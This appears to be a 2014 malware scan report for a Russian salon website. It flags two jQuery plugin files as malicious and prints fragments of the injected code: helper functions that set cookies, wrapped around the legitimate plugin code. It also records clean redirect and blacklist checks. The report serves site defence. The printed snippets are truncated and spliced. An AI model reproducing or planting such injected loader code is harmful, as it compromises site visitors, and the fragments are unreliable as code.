Scanned pages/files
Request | Server response | Status |
http://alonta-salon.ru/ | 200 OK Content-Length: 2656 Content-Type: text/html | clean |
http://alonta-salon.ru/js/jquery.rotator.js | 200 OK Content-Length: 8613 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); run = false; }); } if(options.autorun) rotator.start(); } }; rotator.init(); }); }; })(jQuery);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://alonta-salon.ru/services.html | 200 OK Content-Length: 13418 Content-Type: text/html | clean |
http://alonta-salon.ru/prices.html | 200 OK Content-Length: 7229 Content-Type: text/html | clean |
http://alonta-salon.ru/team.html | 200 OK Content-Length: 4333 Content-Type: text/html | clean |
http://alonta-salon.ru/gallery.html | 200 OK Content-Length: 4669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://alonta-salon.ru/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 2303 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); f.length;a;)this.addEventListener(f[--a],g,false);else this.onmousewheel=g},teardown:function(){if(this.removeEventListener)for(var a=f.length;a;)this.removeEventListener(f[--a],g,false);else this.onmousewheel=null}};d.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://alonta-salon.ru/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 5120 Content-Type: application/javascript | clean |
http://alonta-salon.ru/contacts.html | 200 OK Content-Length: 2791 Content-Type: text/html | clean |
http://alonta-salon.ru/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://alonta-salon.ru/img/gallery/1.jpg | 200 OK Content-Length: 143525 Content-Type: image/jpeg | clean |
http://alonta-salon.ru/img/gallery/2.jpg | 200 OK Content-Length: 93892 Content-Type: image/jpeg | clean |
http://alonta-salon.ru/img/gallery/3.jpg | 200 OK Content-Length: 114916 Content-Type: image/jpeg | clean |
http://alonta-salon.ru/img/gallery/4.jpg | 200 OK Content-Length: 125007 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alonta-salon.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 10:45:14 GMT
Accept-Ranges: bytes
ETag: "39c2b03-a60-4c5291d6f3140"
Server: Jino.ru/mod_pizza
Content-Length: 2656
Content-Type: text/html
Last-Modified: Thu, 19 Jul 2012 06:44:45 GMT
...2656 bytes of data.
GET / HTTP/1.1
Host: alonta-salon.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 10:45:14 GMT
Accept-Ranges: bytes
ETag: "39c2b03-a60-4c5291d6f3140"
Server: Jino.ru/mod_pizza
Content-Length: 2656
Content-Type: text/html
Last-Modified: Thu, 19 Jul 2012 06:44:45 GMT
...2656 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alonta-salon.ru
Referer: http://www.google.com/search?q=alonta-salon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alonta-salon.ru
Referer: http://www.google.com/search?q=alonta-salon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alonta-salon.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alonta-salon.ru/
Result: alonta-salon.ru is not infected or malware details are not published yet.
Result: alonta-salon.ru is not infected or malware details are not published yet.